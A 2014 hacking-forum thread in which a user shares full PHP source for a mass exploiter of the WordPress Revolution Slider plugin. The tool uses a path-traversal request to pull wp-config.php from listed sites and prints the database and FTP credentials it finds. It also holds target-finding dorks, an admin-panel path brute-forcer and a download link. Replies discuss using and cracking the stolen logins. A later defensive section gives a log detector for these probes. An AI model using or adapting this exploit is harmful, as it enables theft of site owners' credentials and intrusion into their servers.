[Priv8] Mass Revslider Plugin Exploiting v1


09-22-2014, 04:55 AM #1
AMir dZ 52 Offline Junior Member **
Salam all,
In this thread I share with you my private tool for exploiting ...
The tool is very private ...
The tool can grab configs & FTP ...
The dorks are in the script ...
You put it on localhost or upload it ...
DOWNLOAD: http://www.gulfup.com/?NBfDNQ
PHP Code:
<?
echo"
<body bgcolor='#000000' text='white'>
<title>Mass Revslider Exl0it1ng</title>
<style>
body,table{background: black; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,textarea,table,td,tr,#gg
{
border-style:solid;
text-decoration:bold;
}
input:hover,tr:hover,td:hover,textarea:hover
{
background-color: #FFFFCC;
color:green;
size:10px;
}
</style>
<center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
<!--- Menu -----!--->
<p align='center' dir='ltr'>
<font face='Verdana' size='2' color='#FFFFFF'>#
<a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~ 
<a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> # </font>
<br><br>
"
;


/////////////////////////////////
if ($_GET['dz'] == 'exp') {
echo
"<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>"
;
function 
findit($mytext,$starttag,$endtag) {
 
$posLeft  stripos($mytext,$starttag)+strlen($starttag);
 
$posRight stripos($mytext,$endtag,$posLeft+1);
 return  
substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if(
$ya){
 
$e=explode("\r\n",$co);
 foreach(
$e as $bda){
    
//echo '<br>'.$bda;
    /// you can devlope the tool ///
    
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
    
$dn=($bda).($linkof);
    
$file[email protected]file_get_contents($dn);
    if(
eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
    echo
"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
    echo 
"<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo 
"<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
    }
    elseif(
eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
    echo
"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";    
    echo 
"<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
    }
    else{
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';    
    echo 
"<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
 }
 
}
}
/////////////////////////////////////

/////////////////////////////////////
if ($_GET['dz'] == 'dorks') {
echo
'<br><textarea cols=50 rows=12 >
inurl:wp-content/plugins/revslider/
inurl:revslider
inurl:revslider_admin.php
inurl:revslider_front.php
inurl:plugins/revslider/
intext:Powered by Revslider
intitle:"Index Of/ revslider"
intitle:"Index Of/wp-content/themes/revslider"
intitle:"Index Of/wp-content/plugins/revslider"
intitle:"Index Of/admin/revslider"
intitle:"Index Of/fr/revslider"
intitle:"Index Of/en/revslider"
intitle:"Index Of/us/revslider"
intitle:"Index Of/ar/revslider"
intitle:"Index Of/es/revslider"
intitle:"Index Of/de/revslider"
</textarea>'
;

}
//////////////////////////////////////

//////////////////////////////////////
if ($_GET['dz'] == 'toip') {
echo
"
<form method='post' ><center>
<textarea cols='50' rows='12' name='site2ip' >www.example.com
Please Romove http:// or https://</textarea></br><br>
<input type='submit' name='w2ip' value='Extract' ><br>
</center>"
;
if(isset(
$_POST['site2ip'])){ 
foreach(
explode("\n",$_POST['site2ip']) as $site4ip){ 
$ipp=trim($site4ip);
echo 
'<font color="red" size="3"></font><font color="green" size="5"><center>
<font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'
.$ipp.'</font>
<font color=white face=Verdana size=-2>  ==> </font> <font color=Green face=Verdana size=-2>'
.gethostbyname ($ipp).'</font></center></font>'
}
}
}
////////////////////////////////////

////////////////////////////////////
if ($_GET['dz'] == 'db') {


echo
'
<form action ="" method="post">
<font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>'
;
$site $_POST['site'];
$list = array(
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/DB_ADMIN/',
'/db_admin/',
'/DBA/',
'/SQLI/',
'/dba/',
'/sqli/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/dev/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
'/PhpMyAdmin/',
'/phpmyadmin/',
'/myadmin/',
'/mysql/',
'/sql/',
'/server/',
'/db/',
'/database/',
'/databases/',
'/adm/',
'/configuration/',
'/configure/',
'/administrator/',
'/login/',
'/moderator/',
'/controlpanel/',
'/adminpanel/',
'/admincontrol/',
'/fileadmin/',
'/data/',
'/postgresql/',
'/oracle/',
'/msssql/',
'/msaccess/',
'/sysadmin/',
'/serverdata/',
'/webadmin/',
'/admins/',
'/Database_Administration/',
'/WebAdmin/',
'/useradmin/',
'/sysadmins/',
'/admin1/',
'/system-administration/',
'/administrators/',
'/pgadmin/',
'/directadmin/',
'/staradmin/',
'/ServerAdministrator/',
'/SysAdmin/',
'/administer/',
'/LiveUser_Admin/',
'/sys-admin/',
'/typo3/',
'/panel/',
'/xlogin/',
'/smblogin/',
'/phpldapadmin/',
'/server_admin/',
'/database_administration/',
'/system_administration/',
'/ss_vms_admin_sm/',
'/adminarea/',
'/MySQL/',
'/mysql_admin/',
'/server_data/',
'/DB/',
'/DB1/',
'/DB2/',
'/DB3/',
'/DB4/',
'/DB5/',
'/DB6/',
'/DB7/',
'/DB8/',
'/DB9/',
'/DB0/',
'/db1/',
'/db2/',
'/db3/',
'/db4/',
'/db5/',
'/db6/',
'/db7/',
'/db8/',
'/db9/',
'/db0/',
'/mysql5/',
'/mysql4/',
'/root/',
'/apache/',
'/php/',
'/Apache/',
'/Php/',
'/apach/',
'/apachepanel/',
'/WEBSERVERS/',
'/DATABASE1/',
'/DATABASE2/',
'/DATABASE3/',
'/DATABASE4/',
'/DATABASE5/',
'/DATABASE6/',
'/DATABASE7/',
'/DATABASE8/',
'/DATABASE9/',
'/WEBDATA/',
'/WEB_DATA/',
'/webservers/',
'/database1/',
'/database2/',
'/database3/',
'/database4/',
'/database5/',
'/database6/',
'/database7/',
'/database8/',
'/database9/',
'/webdata/',
'/web_data/',
);

if(isset(
$site)){

foreach(
$list as $path => $test) {
$ch curl_init();
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_URL$site.$test);
$result curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/"$result)){
echo 
"<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
}
else if (
preg_match("/401 Unauthorized/"$result)) {
echo 
"<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
echo 
"<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
}
}
echo 
"<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
}


}
////////////////////////////////////





if ($_GET['dz'] == 'scan') {

echo 
"<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://[email protected] >[email protected] </a>  ....</font></u></b>";
}




?>



<center>
<code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
<font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
</center> 
[Image: 6U9YjJ.png]
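
For defenders, the request the script above sends (`/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php`) leaves a recognisable trace in web server access logs. The following is an added example, not part of the original post: a Python check that flags `revslider_show_image` requests whose `img` value traverses directories or is not an image. The log lines are constructed samples; the combined log format and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2014:05:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3121 "-" "-"
203.0.113.7 - - [22/Sep/2014:05:01:13 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 404 0 "-" "-"
198.51.100.4 - - [22/Sep/2014:05:02:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2014/09/slide1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Sep/2014:05:03:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_revslider_probes(log_text):
    """Return one finding per revslider_show_image request for a traversal or non-image path."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-log-format line
        ip, ts, _method, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/admin-ajax.php"):
            continue
        params = parse_qs(url.query)  # parse_qs removes one layer of percent-encoding
        if "revslider_show_image" not in params.get("action", []):
            continue
        img = decode_fully(params.get("img", [""])[0]).replace("\\", "/")
        traversal = ".." in img.split("/")
        if traversal or not img.lower().endswith(IMAGE_EXT):
            served = status == "200" and size not in ("-", "0")
            findings.append({"ip": ip, "time": ts, "img": img,
                             "traversal": traversal, "likely_disclosed": served})
    return findings

if __name__ == "__main__":
    for finding in find_revslider_probes(SAMPLE_LOG):
        print(finding)
```

A finding with `likely_disclosed` set means the server answered 200 with a body, so the database credentials in `wp-config.php` should be treated as exposed and rotated.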

09-23-2014, 01:26 AM #2
T3N38R15 Offline ? lawless-coder *****
Great share, and the code is good too.


09-23-2014, 04:20 AM #3
CromaS Offline Junior Member **
How can I connect to that DB?

09-23-2014, 05:03 AM #4
T3N38R15 Offline ? lawless-coder *****
Use some MySQL client or a PHP script ... it is not so hard ...


09-23-2014, 05:13 AM #5
CromaS Offline Junior Member **
Yes, but that password doesn't work because it is encrypted...

09-23-2014, 05:33 AM #6
T3N38R15 Offline ? lawless-coder *****
then decrypt it ...
(crack it)


08-31-2017, 06:26 PM #7
catchme007 Offline Member ***
What do I use for the server in the MySQL client if I get localhost in the DB?